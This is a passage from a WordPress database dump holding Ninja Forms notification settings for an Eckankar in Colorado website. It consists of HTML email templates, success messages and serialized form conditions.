Received'),(170,8,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Loveland Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland ECK Leadership organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_142} {field:lastname_143}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Loveland Initiators and ESAs</span> form submission.<br><br><br>\n </strong><br><br><br>\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland ECK Leadership organization</em>.<br><br><br>\n <strong><br><br><br>\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_142} {field:lastname_143}</span> has submitted:</strong></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>'),(171,8,'attach_csv','0','attach_csv','0'),(172,8,'email_format','html','email_format','html'),(173,8,'reply_to','','reply_to',''),(174,8,'cc','','cc',''),(175,8,'bcc','','bcc',''),(176,8,'redirect_url','','redirect_url',''),(177,8,'success_msg','','success_msg',''),(178,8,'label','Admin Email','label','Admin Email'),(179,8,'objectType','Action','objectType','Action'),(180,8,'objectDomain','actions','objectDomain','actions'),(181,8,'editActive','','editActive',''),(182,8,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(183,8,'payment_gateways','','payment_gateways',''),(184,8,'payment_total','0','payment_total','0'),(185,8,'tag','','tag',''),(186,8,'email_message_plain','','email_message_plain',''),(187,8,'drawerDisabled','','drawerDisabled',''),(188,8,'parent_id','2','parent_id','2'),(299,13,'title','','title',''),(300,13,'key','','key',''),(301,13,'type','save','type','save'),(302,13,'active','1','active','1'),(303,13,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(304,13,'label','Save Form','label','Save Form'),(305,13,'parent_id','4','parent_id','4'),(306,14,'title','','title',''),(307,14,'key','','key',''),(308,14,'type','email','type','email'),(309,14,'active','1','active','1'),(310,14,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(311,14,'date_updated','2016-01-15','date_updated','2016-01-15'),(312,14,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(313,14,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(314,14,'to','{field:email_204}','to','{field:email_204}'),(315,14,'email_subject','Add/Update Email or Address','email_subject','Add/Update Email or Address'),(316,14,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b> Member Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b> Member Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(317,14,'attach_csv','0','attach_csv','0'),(318,14,'email_format','html','email_format','html'),(319,14,'reply_to','','reply_to',''),(320,14,'cc','','cc',''),(321,14,'bcc','','bcc',''),(322,14,'redirect_url','','redirect_url',''),(323,14,'success_msg','','success_msg',''),(324,14,'label','Send copy to user','label','Send copy to user'),(325,14,'parent_id','4','parent_id','4'),(326,15,'title','','title',''),(327,15,'key','','key',''),(328,15,'type','successmessage','type','successmessage'),(329,15,'active','1','active','1'),(330,15,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(331,15,'date_updated','2016-01-15','date_updated','2016-01-15'),(332,15,'from_name','','from_name',''),(333,15,'from_address','','from_address',''),(334,15,'to','{wp:admin_email}','to','{wp:admin_email}'),(335,15,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(336,15,'email_message','{fields_table}','email_message','{fields_table}'),(337,15,'attach_csv','0','attach_csv','0'),(338,15,'email_format','html','email_format','html'),(339,15,'reply_to','','reply_to',''),(340,15,'cc','','cc',''),(341,15,'bcc','','bcc',''),(342,15,'redirect_url','','redirect_url',''),(343,15,'success_msg','<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>','success_msg','<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>'),(344,15,'label','Success Message','label','Success Message'),(345,15,'parent_id','4','parent_id','4'),(346,16,'title','','title',''),(347,16,'key','','key',''),(348,16,'type','email','type','email'),(349,16,'active','1','active','1'),(350,16,'created_at','2018-01-03 11:45:13','created_at','2018-01-03 11:45:13'),(351,16,'date_updated','2016-01-19','date_updated','2016-01-19'),(352,16,'from_name','Add/Update Email or Address','from_name','Add/Update Email or Address'),(353,16,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(354,16,'to','co.eck.dba@eckankar-colorado.org','to','co.eck.dba@eckankar-colorado.org'),(355,16,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(356,16,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Member</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission from an ECK Member.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Member</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission from an ECK Member.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>'),(357,16,'attach_csv','0','attach_csv','0'),(358,16,'email_format','html','email_format','html'),(359,16,'reply_to','','reply_to',''),(360,16,'cc','','cc',''),(361,16,'bcc','','bcc',''),(362,16,'redirect_url','','redirect_url',''),(363,16,'success_msg','','success_msg',''),(364,16,'label','Admin Email','label','Admin Email'),(365,16,'parent_id','4','parent_id','4'),(366,17,'title','','title',''),(367,17,'key','','key',''),(368,17,'type','save','type','save'),(369,17,'active','1','active','1'),(370,17,'created_at','2018-01-03 11:43:24','created_at','2018-01-03 11:43:24'),(371,17,'label','Save Form','label','Save Form'),(372,17,'objectType','Action','objectType','Action'),(373,17,'objectDomain','actions','objectDomain','actions'),(374,17,'editActive','','editActive',''),(375,17,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(376,17,'payment_gateways','','payment_gateways',''),(377,17,'payment_total','0','payment_total','0'),(378,17,'tag','','tag',''),(379,17,'to','{wp:admin_email}','to','{wp:admin_email}'),(380,17,'reply_to','','reply_to',''),(381,17,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(382,17,'email_message','{fields_table}','email_message','{fields_table}'),(383,17,'email_message_plain','','email_message_plain',''),(384,17,'from_name','','from_name',''),(385,17,'from_address','','from_address',''),(386,17,'email_format','html','email_format','html'),(387,17,'cc','','cc',''),(388,17,'bcc','','bcc',''),(389,17,'redirect_url','','redirect_url',''),(390,17,'parent_id','5','parent_id','5'),(391,18,'title','','title',''),(392,18,'key','','key',''),(393,18,'type','email','type','email'),(394,18,'active','1','active','1'),(395,18,'created_at','2018-01-03 11:43:24','created_at','2018-01-03 11:43:24'),(396,18,'date_updated','2016-01-15','date_updated','2016-01-15'),(397,18,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(398,18,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(399,18,'to','{field:email_83}','to','{field:email_83}'),(400,18,'email_subject','Alamosa Initiators and ESAâs','email_subject','Alamosa Initiators and ESAâs'),(401,18,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_81},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the \"Alamosa Colorado Leadership Communications\" team.</p><br /><br 